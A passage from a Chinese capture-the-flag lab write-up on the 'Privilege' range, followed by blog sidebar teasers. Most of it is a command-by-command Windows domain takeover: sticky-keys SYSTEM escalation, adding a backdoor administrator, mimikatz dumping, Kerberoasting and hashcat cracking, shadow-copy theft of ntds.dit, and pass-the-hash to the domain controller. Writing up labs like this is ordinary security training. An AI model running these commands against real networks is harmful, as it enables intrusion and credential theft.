proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

会发现用户的特权还多了一些

在这里插入图片描述

会发现存在SeRestorePrivilege的特权，

SeRestorePrivilege是一个高权限特权，允许用户绕过文件和注册表的访问控制列表（ACL），直接修改系统文件或者编辑注册表

我们可以把cmd.exe重命名为sethc.exe，sethc.exe是Windows辅助功能的一部分，当用户在锁屏界面连按五次Shift键时，系统会以SYSTEM权限运行sethc.exe（即粘滞键程序）,将cmd.exe伪装成sethc.exe，用户可以在锁屏界面触发命令提示符，并以SYSTEM权限运行, 从而完成提权

cd C:\Windows\System32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

切换到C:\Windows\System32目录下, 这个目录下存在很多关键的可执行文件
ren重命名文件

在这里插入图片描述

完成前面操作后再通过rdp远程登录上去

proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

通过锁定账户, 进入登录页面, 然后按5下shift 键, 触发粘滞键程序, 从而运行伪装成sethc.exe的cmd.exe, 并且是system权限

在这里插入图片描述

添加一个管理员账户用于rdp远程登录, 前面zhangshuai账户只是一个普通用户, 很多权限都不足, 所以需要添加一个管理员用户

type C:\Users\Administrator\flag\flag03.txt
net user xpw 123qwe! /add
net localgroup administrators xpw /add

在这里插入图片描述

然后再以添加的管理员账户rdp登录上去

proxychains4 xfreerdp /u:xpw /p:123qwe!  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

mimikatz

上传一个猕猴桃, 抓取用户hash

privilege::debug
sekurlsa::logonpasswords

可以抓取到机器账户的NTLM值

在这里插入图片描述

31e653ce951ba9faaefbc64dcc6126f1

spn

拿着 XR-0923$ 的ntlm哈希查找SPN能找到一个tianjing用户

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11

在这里插入图片描述

拿tianjing用户的TGS票据

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11 -request-user tianjing

离线爆破明文

$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$2a9fad23d5375b846ff6d5d6d1f48efc$44b39ad4d62380b44b66af2f769c37995611ac6d0fba46d1224f22ef3d8ca8a3139d2584325e0fe73336f8a1e96bd7d19a7e008a61ec097730feec02eb090f03b64b05123843c4a08e10e42c69a5508edca8be40f6875118055d111c04187b9bb3509201f3f4993b3d8a25b14703e8406460d44f927cf89b7c8e02c1ffa67117bef6d0cc9af2628a4e1c04f25d0fb4523f57674102c67b3d9643f60f64bde96c75c482f778fcd7cd2d86a90597098c930ff8a4b322e6adf0bf4f0a57c0b33ebd7082b271ed439b7cf7ced8b3d310ad3e21c4174a2d70b12a57cc78cd756625327d42a30d34b9c6dd179043604001a015e8be674987c89633e007b881fb773cac233e011fba4f0aad9bd78ba439ae8d0ec771553ed39b47a6e6a4068e2495dcee59d29c9f37f3e0b2089d9071a47e81f116a1b7c8b7e43a3872861aa2458c2316b304933e9a62d9e9857a9e02e67cd40db29b6605e1d5688c8c24da9d1c762b271183f9b79bed008c64cd3bed9d9c9850be4b5b56ae71753826c6e9f4f183b0ec84f60597fd44ffe55ebb80913440f42d1f789efecfe6bf0a7970178991308cc44132577769fa2e186749d4f95602dce7c1c2849882de6acd458cc4f12e36e66d20441514a7b87b397f3898dc6cfc7cb0cc7aeaa591ddb15c1624444e2cb977c001c2ad186cf0dd868fb4bfcf5a062d22a5257c23d3326f3b7b17a7328c9524f827f9bbdd346a0abde6cf99cd35b3fd4babfb39da923e8b82181104ccdcd64c015db187abe3ad9f3b0e912a4422971669d8c79293e67dc544ef0ad60401d162332066037397be93929b526abaf646435c06d5d65dca03b0647628d7f77732d9df99796dc76fc82be97580bbc83525633b7a0605dc5746230cddcd692dff8ef7d5da1bc7439a1cac14efcc61e9572dba07b95c9ae1631cc42f6ae437dd1ce8bee8b5e5e2353c94fbbc554ab4568edf20c1f3a6f5f1d7471a4de755d40c2bf043f5725b285e996ab16fb193a90774bb3d7bdbc55c348b9d336bc0519c9850e373f670eae10e89a481fc5fd6463be9dbb89acaf3e1405b8be03f6bab0d74abf4d9c4dac9762cf35f73cf964437fcd7fccbbe70760833965a970974a8dec0b3f3593c0e9c3969c5adf68c14a8d2888be837fca2311482dd260d2845d0025f8e5ec32faaf852d0f28c5425cd07f937b15f7119945dfda3738105117f32a41afaf1c6471d56a0c6c8dfbb865fe696de816fa6a17d673a419ef4a900e7f7657af74af593547655066159cd4334d0c63c5bc66dc2c981df6489735f41560834eae28358c1e83cc45af139b01e44cfb0c1ca754d7f01d752b6ab0de762dfe9e26032df3b158a2d6a060ca6c2b9372c8b11f955a2e35e6cc3bf3a44070178a1910464f5ec7bb1d3091ad277339c8717ceefc95fdd4e5885fdd108add441785ed27a6d6d5ad96fad59a3a4205b4e2ac7d0d63535243c850d6a2c1d

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

在这里插入图片描述

爆出明文DPQSXSXgh2

卷影拷贝提取SAM

可以通过evil-winrm连上去

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2

在这里插入图片描述

存在 SeBackupPrivilege 和 SeRestorePrivilege 特权

有备份以及还原文件或目录的权限，可以卷影拷贝然后下载ntds.dit文件

本地创一个raj.dsh，写入

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

接着用unix2dos raj.dsh转化格式

在这里插入图片描述

前面evil-winrm连上去的切换到C目录，然后创一个test文件夹切换过去(不然后面会没权限)，把本地的raj.dsh上传上去

mkdir test
cd test
upload raj.dsh

在这里插入图片描述

diskshadow /s raj.dsh

在这里插入图片描述

复制到到当前目录，也就是我们创建的这个test目录

RoboCopy /b z:\windows\ntds . ntds.dit

在这里插入图片描述

把ntds.dit下下来 (速度比较慢)

download ntds.dit

接下来下载system(用的是SeRestorePrivilege特权)

reg save HKLM\SYSTEM system
download system

最后用下载下来的ntds.dit和system本地进行解密

impacket-secretsdump -ntds ntds.dit -system system local

在这里插入图片描述

70c39b547b7d8adec35ad7c09fb1d277

pth拿下域控

proxychains4 impacket-smbexec -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk

或者

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

在这里插入图片描述

参考文章

https://fushuling.com/index.php/2023/10/10/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege/
https://zer0peach.github.io/2024/12/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-privilege-writeup/

[[春秋云境] Privilege仿真场景

文章目录靶标介绍：知识点卷影拷贝(VSS) 外网任意文件读取Jenkins管理员后台rdp远程登录Gitlab apiToken 内网搭建代理 Oracle RCESeRestorePrivilege提权mimikatzspn卷影拷贝提取SAM 参考文章靶标介绍： 在这个靶场中，您将扮演一名资深黑客…...

编程日记 2025/7/22 4:20:26

【工具推荐】--Git详解

本文讲诉，git命令环境的安装和git命令的介绍 Git 是一个非常流行的分布式版本控制系统，它帮助开发者管理和跟踪项目中的代码变化。通俗地说，可以认为 Git 就像是一个代码的时间机器，它记录了项目从开始到结束的每一次代码变动。 …...

编程日记 2025/7/19 4:50:51

在linux里上传本地项目到github中

首先先安装git，安装完git后，输入如下操作指令： 输入自己的用户名和邮箱（为注册GITHUB账号时的用户名和邮箱）： git config --global user.name "111"git config --global user.email "121…...

编程日记 2025/7/22 4:08:08

【基础】Windows开发设置入门8：Windows 子系统 (WSL)操作入门

前言大家熟悉的docker、Python，但对于Windows上有一套开配合开发的相对底层的环境设置，包括powershell、winget、WSL、还有开发驱动器什么的，我准备系统学一下，不然地基不牢，也盖不起冲天高楼~ 本节，介绍…...

编程日记 2025/7/22 4:10:46

服务器上的Nano 编辑器进行git合并

使用git pull拉取后，出现如下部分： GNU nano 2.9.3 /data/zhouy24Files/embody/DSLab-embodied-intelligence/.git/MERGE_MSG Merge branch …...

编程日记 2025/7/20 11:43:12

【idea 报错：java: 非法字符: ‘\ufeff‘】

执行main方法报错：: ‘\ufeff’?package cn.com 截图如下：任何一个mian都不能执行，都报这个写出来希望大家都能快速解决这种少见的问题，还不好弄。我是参考这篇文章就好了：idea 报错：java: 非法字符: …...

编程日记 2025/7/22 4:17:42

BM25（Best Matching 25）介绍与使用

BM25（Best Matching 25）是一种基于概率检索框架的改进算法，主要用于信息检索中的相关性评分。它通过引入词频饱和函数、文档长度归一化等机制，克服了传统TF-IDF算法的局限性。一、BM25的核心原理 1. 改进TF-IDF的三大维度词频…...

编程日记 2025/7/22 4:13:12

.NET 函数：检测 SQL 注入风险

以下是一个用 C# 编写的 .NET 函数，用于检测用户输入是否存在潜在的 SQL 注入风险： using System; using System.Text.RegularExpressions;public class SqlInjectionChecker {// 常见 SQL 注入关键词和模式private static readonly string[] SqlKeywor…...

编程日记 2025/7/13 9:03:50

远程数据采集智能网关支持下的雨洪资源分布式监测网络搭建实践

一、项目背景随着城市化进程的加快以及气候变化的影响，雨洪水管理成为了城市基础设施建设中的重要课题。传统的雨洪水监测手段主要依赖人工巡查和固定站点监测，存在数据获取不及时、不全面，以及在恶劣天气条件下人员安全隐患等诸多问题。为…...

编程日记 2025/7/13 23:01:33

LinuxYUM下载笔记

在基于RPM的Linux发行版（如CentOS、RHEL、Fedora等）中，YUM（Yellowdog Updater Modified）是默认的包管理工具，用于简化软件的安装、更新和依赖管理。以下是YUM的使用指南： 一、检查YUM是否安装 …...

编程日记 2025/7/22 4:11:59

研读论文《Attention Is All You Need》（7）

原文 14 3.2 Attention An attention function can be described as mapping a query and a set of key-value pairs to an output, where the query, keys, values, and output are all vectors. The output is computed as a weighted sum of the values, where the weight…...

编程日记 2025/7/22 4:17:40

文章目录

靶标介绍：

知识点

卷影拷贝(VSS)

外网

任意文件读取

Jenkins管理员后台

rdp远程登录

Gitlab apiToken

内网

搭建代理

Oracle RCE

SeRestorePrivilege提权

mimikatz

spn

卷影拷贝提取SAM

参考文章

相关文章：